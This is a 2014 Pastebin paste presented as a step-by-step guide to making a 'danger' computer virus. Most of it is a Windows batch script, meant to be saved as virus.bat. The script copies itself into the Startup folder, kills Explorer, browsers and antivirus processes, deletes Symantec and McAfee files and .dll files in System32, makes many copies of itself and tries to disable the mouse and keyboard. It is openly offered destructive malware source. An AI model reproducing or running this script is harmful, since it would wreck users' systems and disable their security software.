Advertisement
Faeizzamriee

Virus!!! Create a Danger Computer Virus

Aug 24th, 2014
596
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.92 KB | None | 0 0
  1. Virus!!!
  2. Create a Danger Computer Virus
  3. You might be scared of danger viruses in your computer or laptop. They affect the working of the computer systems and create new problem. If you want to create your own virus, then this guide will show you how to create a simple virus. Follow step by step guide below:
  4.  
  5. Go to desktop & open the notepad file and simply copy the following code and paste into notepad file. The following code is given below:
  6.  
  7. Step 1: Open Notepad:
  8.  
  9. Step 2: Paste into notepad file Via Ctrl + V
  10.  
  11. Step 3: Save it as a “virus.bat” or “virus.exe”
  12.  
  13.  
  14. @echo off
  15. copy"virus.bat""c:\documents and settings\all users\start menu\programs\startup"
  16. copy "virus.bat" "c:\"
  17. copy "virus.bat" "%userprofile%\my documents"
  18. tskill explorer
  19. tskill ccapp
  20. tskill yahoomessenger
  21. tskill firefox
  22. tskill chrome
  23. rem made with batch virus maker v.2
  24. tskill iexplorer
  25. time 12:00
  26. rem made with batch virus maker v.2
  27. del c:\program files\common files\symantec shared\ccapp.exe
  28. cd c:\windows
  29. if exist "*.bat" del "*.bat"
  30. cd c:\windows\system32
  31. rem made with batch virus maker v.2
  32. if exist "*.dll" del "*.dll"
  33. tskill mcafee security centre module
  34. del c:\program files\mcafee.com\agent\mcdetect.exe
  35. rem made with batch virus maker v.2
  36. copy "virus.bat" "virus.bat45544"
  37. copy "virus.bat" "virus.bat85858"
  38. copy "virus.bat" "virus.bat1645"
  39. copy "virus.bat" "virus.bat574457"
  40. copy "virus.bat" "virus.bat55457"
  41. copy "virus.bat" "virus.bat9765"
  42. copy "virus.bat" "virus.bat45465"
  43. rem made with batch virus maker v.2
  44. copy "virus.bat" "virus.bat456877"
  45. copy "virus.bat" "virus.bat77989845"
  46. copy "virus.bat" "virus.bat2135"
  47. copy "virus.bat" "virus.bat46876"
  48. rem made with batch virus maker v.2
  49. copy "virus.bat" "virus.bat45687"
  50. copy "virus.bat" "virus.bat8868"
  51. copy "virus.bat" "virus.bat2000"
  52. copy "virus.bat" "virus.bat2009"
  53. msg * this is a virus
  54. rundll mouse,disable
  55. rem made with batch virus maker v.2
  56. rundll keyboard,disable
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement